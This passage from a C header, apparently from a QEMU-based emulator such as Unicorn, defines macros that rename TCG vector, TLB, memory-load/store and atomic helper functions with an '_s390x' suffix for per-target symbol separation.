tcg_gen_gvec_dup_i32_s390x #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_s390x #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_s390x #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_s390x #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_s390x #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_s390x #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_s390x #define tcg_gen_gvec_not tcg_gen_gvec_not_s390x #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_s390x #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_s390x #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_s390x #define tcg_gen_gvec_add tcg_gen_gvec_add_s390x #define tcg_gen_gvec_adds tcg_gen_gvec_adds_s390x #define tcg_gen_gvec_addi tcg_gen_gvec_addi_s390x #define tcg_gen_gvec_subs tcg_gen_gvec_subs_s390x #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_s390x #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_s390x #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_s390x #define tcg_gen_gvec_sub tcg_gen_gvec_sub_s390x #define tcg_gen_gvec_mul tcg_gen_gvec_mul_s390x #define tcg_gen_gvec_muls tcg_gen_gvec_muls_s390x #define tcg_gen_gvec_muli tcg_gen_gvec_muli_s390x #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_s390x #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_s390x #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_s390x #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_s390x #define tcg_gen_gvec_smin tcg_gen_gvec_smin_s390x #define tcg_gen_gvec_umin tcg_gen_gvec_umin_s390x #define tcg_gen_gvec_smax tcg_gen_gvec_smax_s390x #define tcg_gen_gvec_umax tcg_gen_gvec_umax_s390x #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_s390x #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_s390x #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_s390x #define tcg_gen_gvec_neg tcg_gen_gvec_neg_s390x #define tcg_gen_gvec_abs tcg_gen_gvec_abs_s390x #define tcg_gen_gvec_and tcg_gen_gvec_and_s390x #define tcg_gen_gvec_or tcg_gen_gvec_or_s390x #define tcg_gen_gvec_xor tcg_gen_gvec_xor_s390x #define tcg_gen_gvec_andc tcg_gen_gvec_andc_s390x #define tcg_gen_gvec_orc tcg_gen_gvec_orc_s390x #define tcg_gen_gvec_nand tcg_gen_gvec_nand_s390x #define tcg_gen_gvec_nor tcg_gen_gvec_nor_s390x #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_s390x #define tcg_gen_gvec_ands tcg_gen_gvec_ands_s390x #define tcg_gen_gvec_andi tcg_gen_gvec_andi_s390x #define tcg_gen_gvec_xors tcg_gen_gvec_xors_s390x #define tcg_gen_gvec_xori tcg_gen_gvec_xori_s390x #define tcg_gen_gvec_ors tcg_gen_gvec_ors_s390x #define tcg_gen_gvec_ori tcg_gen_gvec_ori_s390x #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_s390x #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_s390x #define tcg_gen_gvec_shli tcg_gen_gvec_shli_s390x #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_s390x #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_s390x #define tcg_gen_gvec_shri tcg_gen_gvec_shri_s390x #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_s390x #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_s390x #define tcg_gen_gvec_sari tcg_gen_gvec_sari_s390x #define tcg_gen_gvec_shls tcg_gen_gvec_shls_s390x #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_s390x #define tcg_gen_gvec_sars tcg_gen_gvec_sars_s390x #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_s390x #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_s390x #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_s390x #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_s390x #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_s390x #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_s390x #define vec_gen_2 vec_gen_2_s390x #define vec_gen_3 vec_gen_3_s390x #define vec_gen_4 vec_gen_4_s390x #define tcg_gen_mov_vec tcg_gen_mov_vec_s390x #define tcg_const_zeros_vec tcg_const_zeros_vec_s390x #define tcg_const_ones_vec tcg_const_ones_vec_s390x #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_s390x #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_s390x #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_s390x #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_s390x #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_s390x #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_s390x #define tcg_gen_dupi_vec tcg_gen_dupi_vec_s390x #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_s390x #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_s390x #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_s390x #define tcg_gen_ld_vec tcg_gen_ld_vec_s390x #define tcg_gen_st_vec tcg_gen_st_vec_s390x #define tcg_gen_stl_vec tcg_gen_stl_vec_s390x #define tcg_gen_and_vec tcg_gen_and_vec_s390x #define tcg_gen_or_vec tcg_gen_or_vec_s390x #define tcg_gen_xor_vec tcg_gen_xor_vec_s390x #define tcg_gen_andc_vec tcg_gen_andc_vec_s390x #define tcg_gen_orc_vec tcg_gen_orc_vec_s390x #define tcg_gen_nand_vec tcg_gen_nand_vec_s390x #define tcg_gen_nor_vec tcg_gen_nor_vec_s390x #define tcg_gen_eqv_vec tcg_gen_eqv_vec_s390x #define tcg_gen_not_vec tcg_gen_not_vec_s390x #define tcg_gen_neg_vec tcg_gen_neg_vec_s390x #define tcg_gen_abs_vec tcg_gen_abs_vec_s390x #define tcg_gen_shli_vec tcg_gen_shli_vec_s390x #define tcg_gen_shri_vec tcg_gen_shri_vec_s390x #define tcg_gen_sari_vec tcg_gen_sari_vec_s390x #define tcg_gen_cmp_vec tcg_gen_cmp_vec_s390x #define tcg_gen_add_vec tcg_gen_add_vec_s390x #define tcg_gen_sub_vec tcg_gen_sub_vec_s390x #define tcg_gen_mul_vec tcg_gen_mul_vec_s390x #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_s390x #define tcg_gen_usadd_vec tcg_gen_usadd_vec_s390x #define tcg_gen_sssub_vec tcg_gen_sssub_vec_s390x #define tcg_gen_ussub_vec tcg_gen_ussub_vec_s390x #define tcg_gen_smin_vec tcg_gen_smin_vec_s390x #define tcg_gen_umin_vec tcg_gen_umin_vec_s390x #define tcg_gen_smax_vec tcg_gen_smax_vec_s390x #define tcg_gen_umax_vec tcg_gen_umax_vec_s390x #define tcg_gen_shlv_vec tcg_gen_shlv_vec_s390x #define tcg_gen_shrv_vec tcg_gen_shrv_vec_s390x #define tcg_gen_sarv_vec tcg_gen_sarv_vec_s390x #define tcg_gen_shls_vec tcg_gen_shls_vec_s390x #define tcg_gen_shrs_vec tcg_gen_shrs_vec_s390x #define tcg_gen_sars_vec tcg_gen_sars_vec_s390x #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_s390x #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_s390x #define tb_htable_lookup tb_htable_lookup_s390x #define tb_set_jmp_target tb_set_jmp_target_s390x #define cpu_exec cpu_exec_s390x #define cpu_loop_exit_noexc cpu_loop_exit_noexc_s390x #define cpu_reloading_memory_map cpu_reloading_memory_map_s390x #define cpu_loop_exit cpu_loop_exit_s390x #define cpu_loop_exit_restore cpu_loop_exit_restore_s390x #define cpu_loop_exit_atomic cpu_loop_exit_atomic_s390x #define tlb_init tlb_init_s390x #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_s390x #define tlb_flush tlb_flush_s390x #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_s390x #define tlb_flush_all_cpus tlb_flush_all_cpus_s390x #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_s390x #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_s390x #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_s390x #define tlb_flush_page tlb_flush_page_s390x #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_s390x #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_s390x #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_s390x #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_s390x #define tlb_protect_code tlb_protect_code_s390x #define tlb_unprotect_code tlb_unprotect_code_s390x #define tlb_reset_dirty tlb_reset_dirty_s390x #define tlb_set_dirty tlb_set_dirty_s390x #define tlb_set_page_with_attrs tlb_set_page_with_attrs_s390x #define tlb_set_page tlb_set_page_s390x #define get_page_addr_code_hostp get_page_addr_code_hostp_s390x #define get_page_addr_code get_page_addr_code_s390x #define probe_access probe_access_s390x #define tlb_vaddr_to_host tlb_vaddr_to_host_s390x #define helper_ret_ldub_mmu helper_ret_ldub_mmu_s390x #define helper_le_lduw_mmu helper_le_lduw_mmu_s390x #define helper_be_lduw_mmu helper_be_lduw_mmu_s390x #define helper_le_ldul_mmu helper_le_ldul_mmu_s390x #define helper_be_ldul_mmu helper_be_ldul_mmu_s390x #define helper_le_ldq_mmu helper_le_ldq_mmu_s390x #define helper_be_ldq_mmu helper_be_ldq_mmu_s390x #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_s390x #define helper_le_ldsw_mmu helper_le_ldsw_mmu_s390x #define helper_be_ldsw_mmu helper_be_ldsw_mmu_s390x #define helper_le_ldsl_mmu helper_le_ldsl_mmu_s390x #define helper_be_ldsl_mmu helper_be_ldsl_mmu_s390x #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_s390x #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_s390x #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_s390x #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_s390x #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_s390x #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_s390x #define cpu_ldub_data_ra cpu_ldub_data_ra_s390x #define cpu_ldsb_data_ra cpu_ldsb_data_ra_s390x #define cpu_lduw_data_ra cpu_lduw_data_ra_s390x #define cpu_ldsw_data_ra cpu_ldsw_data_ra_s390x #define cpu_ldl_data_ra cpu_ldl_data_ra_s390x #define cpu_ldq_data_ra cpu_ldq_data_ra_s390x #define cpu_ldub_data cpu_ldub_data_s390x #define cpu_ldsb_data cpu_ldsb_data_s390x #define cpu_lduw_data cpu_lduw_data_s390x #define cpu_ldsw_data cpu_ldsw_data_s390x #define cpu_ldl_data cpu_ldl_data_s390x #define cpu_ldq_data cpu_ldq_data_s390x #define helper_ret_stb_mmu helper_ret_stb_mmu_s390x #define helper_le_stw_mmu helper_le_stw_mmu_s390x #define helper_be_stw_mmu helper_be_stw_mmu_s390x #define helper_le_stl_mmu helper_le_stl_mmu_s390x #define helper_be_stl_mmu helper_be_stl_mmu_s390x #define helper_le_stq_mmu helper_le_stq_mmu_s390x #define helper_be_stq_mmu helper_be_stq_mmu_s390x #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_s390x #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_s390x #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_s390x #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_s390x #define cpu_stb_data_ra cpu_stb_data_ra_s390x #define cpu_stw_data_ra cpu_stw_data_ra_s390x #define cpu_stl_data_ra cpu_stl_data_ra_s390x #define cpu_stq_data_ra cpu_stq_data_ra_s390x #define cpu_stb_data cpu_stb_data_s390x #define cpu_stw_data cpu_stw_data_s390x #define cpu_stl_data cpu_stl_data_s390x #define cpu_stq_data cpu_stq_data_s390x #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_s390x #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_s390x #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_s390x #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_s390x #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_s390x #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_s390x #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_s390x #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_s390x #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_s390x #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_s390x #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_s390x #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_s390x #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_s390x #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_s390x #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_s390x #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_s390x #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_s390x #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_s390x #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_s390x #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_s390x #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_s390x #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_s390x #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_s390x #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_s390x #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_s390x #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_s390x #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_s390x #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_s390x #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_s390x #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_s390x #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_s390x #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_s390x #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_s390x #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_s390x #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_s390x #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_s390x #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_s390x #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_s390x #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_s390x #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_s390x #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_s390x #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_s390x #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_s390x #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_s390x #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_s390x #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_s390x #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_s390x #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_s390x #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_s390x #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_s390x #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_s390x #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_s390x #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_s390x #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_s390x #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_s390x #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_s390x #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_s390x #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_s390x #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_s390x #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_s390x #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_s390x #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_s390x #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_s390x #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_s390x #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_s390x #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_s390x #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_s390x #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_s390x #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_s390x #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_s390x #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_s390x #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_s390x #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_s390x #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_s390x #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_s390x #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_s390x #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_s390x #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_s390x #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_s390x #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_s390x #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_s390x #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_s390x #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_s390x #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_s390x #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_s390x #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_s390x #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_s390x #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_s390x #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_s390x #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_s390x #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_s390x #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_s390x #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_s390x #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_s390x #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_s390x #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_s390x #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_s390x #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_s390x #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_s390x #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_s390x #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_s390x #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_s390x #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_s390x #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_s390x #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_s390x #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_s390x #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_s390x #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_s390x #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_s390x #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_s390x #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_s390x #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_s390x #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_s390x #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_s390x #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_s390x #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_s390x #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_s390x #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_s390x #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_s390x #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_s390x #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_s390x #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_s390x #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_s390x #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_s390x #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_s390x #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_s390x #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_s390x #define helper_atomic_xchgb helper_atomic_xchgb_s390x #define helper_atomic_fetch_addb helper_atomic_fetch_addb_s390x #define helper_atomic_fetch_andb helper_atomic_fetch_andb_s390x #define helper_atomic_fetch_orb helper_atomic_fetch_orb_s390x #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_s390x #define helper_atomic_add_fetchb helper_atomic_add_fetchb_s390x #define helper_atomic_and_fetchb helper_atomic_and_fetchb_s390x #define helper_atomic_or_fetchb helper_atomic_or_fetchb_s390x #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_s390x #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_s390x #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_s390x #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_s390x #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_s390x #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_s390x #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_s390x #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_s390x #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_s390x #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_s390x #define helper_atomic_xchgw_le helper_atomic_xchgw_le_s390x #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_s390x #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_s390x #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_s390x #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_s390x #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_s390x #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_s390x #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_s390x #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_s390x #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_s390x #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_s390x #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_s390x #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_s390x #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_s390x #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_s390x #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_s390x #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_s390x #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_s390x #define helper_atomic_xchgw_be helper_atomic_xchgw_be_s390x #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_s390x #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_s390x #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_s390x #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_s390x #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_s390x #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_s390x #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_s390x #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_s390x #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_s390x #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_s390x #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_s390x #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_s390x #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_s390x #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_s390x #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_s390x #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_s390x #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_s390x #define helper_atomic_xchgl_le helper_atomic_xchgl_le_s390x #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_s390x #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_s390x #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_s390x #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_s390x #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_s390x #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_s390x #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_s390x #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_s390x #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_s390x #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_s390x #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_s390x #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_s390x #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_s390x #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_s390x #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_s390x #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_s390x #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_s390x #define helper_atomic_xchgl_be helper_atomic_xchgl_be_s390x #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_s390x #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_s390x #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_s390x #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_s390x #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_s390x #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_s390x #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_s390x #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_s390x #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_s390x #define helper_atomic_fetch_umaxl_be 